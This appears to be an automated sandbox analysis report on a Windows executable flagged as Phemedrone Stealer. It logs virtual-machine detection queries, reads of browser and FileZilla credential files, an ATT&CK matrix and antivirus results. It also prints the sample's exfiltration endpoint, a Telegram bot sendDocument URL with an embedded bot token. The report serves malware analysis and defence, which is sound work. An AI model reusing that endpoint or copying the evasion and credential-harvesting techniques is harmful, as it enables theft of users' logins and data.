            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00055D75 push rdx; iretd 4_2_00055D77
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00056C78 push 00000051h; ret 4_2_00056C7A
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00055A7A push rcx; ret 4_2_00055A7B
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_0005419C push FFFFFFEBh; retf 4_2_000541A8
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00055DA0 push 5188B0F5h; ret 4_2_00055DA5
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00055DAE push rcx; ret 4_2_00055DAF
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_000549D4 push rcx; ret 4_2_000549D8
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_000549D0 push rcx; ret 4_2_000549D3
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_000543DF push rcx; ret 4_2_000543E0
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_000544EE push rcx; retf 4_2_000544F0
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_000549EE push rcx; ret 4_2_000549F7
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_000553EB push rcx; ret 4_2_000553F6
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00055CFD push rcx; ret 4_2_00055D01
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_000549FB push rcx; ret 4_2_000549FC
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_000553FA push rcx; ret 4_2_000553FB
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC53EB02 push eax; retf 4_2_00007FFAAC53EB49
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC53EABA push eax; retf 4_2_00007FFAAC53EB49
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeCode function: 4_2_00007FFAAC526168 push edx; ret 4_2_00007FFAAC5261DB
            Source: Ls4O6Pmixd.exeStatic PE information: section name: .hJL entropy: 7.536963336777202
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
            Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeMemory allocated: 890000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeMemory allocated: 1A4A0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 599011Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 598778Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 598589Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 598454Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 598327Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 598098Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 597958Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 597718Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 597592Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 597483Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 597374Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 597047Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 596500Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 596388Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 596266Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWindow / User API: threadDelayed 1564Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWindow / User API: threadDelayed 3924Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -17524406870024063s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -599890s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -599781s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -599672s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -599562s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -599453s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -599344s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -599234s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -599125s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -599011s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -598891s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -598778s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -598589s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -598454s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -598327s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -598098s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -597958s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -597718s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -597592s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -597483s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -597374s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -597265s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -597156s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -597047s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -596937s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -596828s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -596718s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -596609s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -596500s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -596388s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 6964Thread sleep time: -596266s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 2516Thread sleep time: -30000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exe TID: 2352Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_ComputerSystem
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 599890Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 599781Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 599672Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 599562Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 599453Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 599344Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 599234Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 599125Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 599011Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 598891Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 598778Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 598589Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 598454Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 598327Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 598098Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 597958Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 597718Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 597592Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 597483Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 597374Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 597265Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 597156Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 597047Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 596937Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 596828Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 596718Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 596609Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 596500Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 596388Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 596266Jump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: Ls4O6Pmixd.exe, 00000004.00000002.1423799405.00000000005D5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllBB
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeQueries volume information: C:\Users\user\Desktop\Ls4O6Pmixd.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct

            Stealing of Sensitive Information

            barindex
            Yara detected Generic Stealer
            Source: Yara matchFile source: 00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Ls4O6Pmixd.exe PID: 5200, type: MEMORYSTR
            Yara detected Phemedrone Stealer
            Source: Yara matchFile source: 00000004.00000002.1424388835.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1424388835.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1424388835.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1426211711.00000000127C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1424388835.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1424388835.00000000027B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Ls4O6Pmixd.exe PID: 5200, type: MEMORYSTR
            Tries to harvest and steal browser information (history, passwords, etc)
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\key4.dbJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fu7wner3.default-release\cookies.sqliteJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
            Tries to harvest and steal ftp login credentials
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xmlJump to behavior
            Source: C:\Users\user\Desktop\Ls4O6Pmixd.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior

            Remote Access Functionality

            barindex
            Yara detected Generic Stealer
            Source: Yara matchFile source: 00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Ls4O6Pmixd.exe PID: 5200, type: MEMORYSTR
            Yara detected Phemedrone Stealer
            Source: Yara matchFile source: 00000004.00000002.1424388835.00000000028C2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1424388835.0000000002790000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1424388835.00000000028BE000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1424388835.0000000002588000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1426211711.00000000127C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1424388835.00000000025A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.1424388835.00000000027B8000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Ls4O6Pmixd.exe PID: 5200, type: MEMORYSTR

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire InfrastructureValid Accounts231
            Windows Management Instrumentation            		1
            DLL Side-Loading            		1
            DLL Side-Loading            		1
            Masquerading            		2
            OS Credential Dumping            		231
            Security Software Discovery            		Remote Services1
            Archive Collected Data            		1
            Web Service            		Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
            Disable or Modify Tools            		LSASS Memory1
            Process Discovery            		Remote Desktop Protocol2
            Data from Local System            		21
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)251
            Virtualization/Sandbox Evasion            		Security Account Manager251
            Virtualization/Sandbox Evasion            		SMB/Windows Admin SharesData from Network Shared Drive1
            Ingress Tool Transfer            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
            Obfuscated Files or Information            		NTDS1
            Application Window Discovery            		Distributed Component Object ModelInput Capture3
            Non-Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Software Packing            		LSA Secrets123
            System Information Discovery            		SSHKeylogging14
            Application Layer Protocol            		Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
            DLL Side-Loading            		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            Ls4O6Pmixd.exe42%VirustotalBrowse
            Ls4O6Pmixd.exe58%ReversingLabsWin32.Trojan.SpywareX
            Ls4O6Pmixd.exe100%AviraHEUR/AGEN.1309950
            Ls4O6Pmixd.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            No Antivirus matches

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            get.geojs.io
            		104.26.0.100
            		truefalse
              		high
              api.telegram.org
              		149.154.167.220
              		truefalse
                		high

                Contacted URLs

                NameMaliciousAntivirus DetectionReputation
                https://get.geojs.io/v1/ip/geo.jsonfalse
                  		high
                  https://api.telegram.org/bot7604180600:AAHwr2u1ZveiHzQQ_yVoPYP2QNFw1punco0/sendDocumentfalse
                    		high

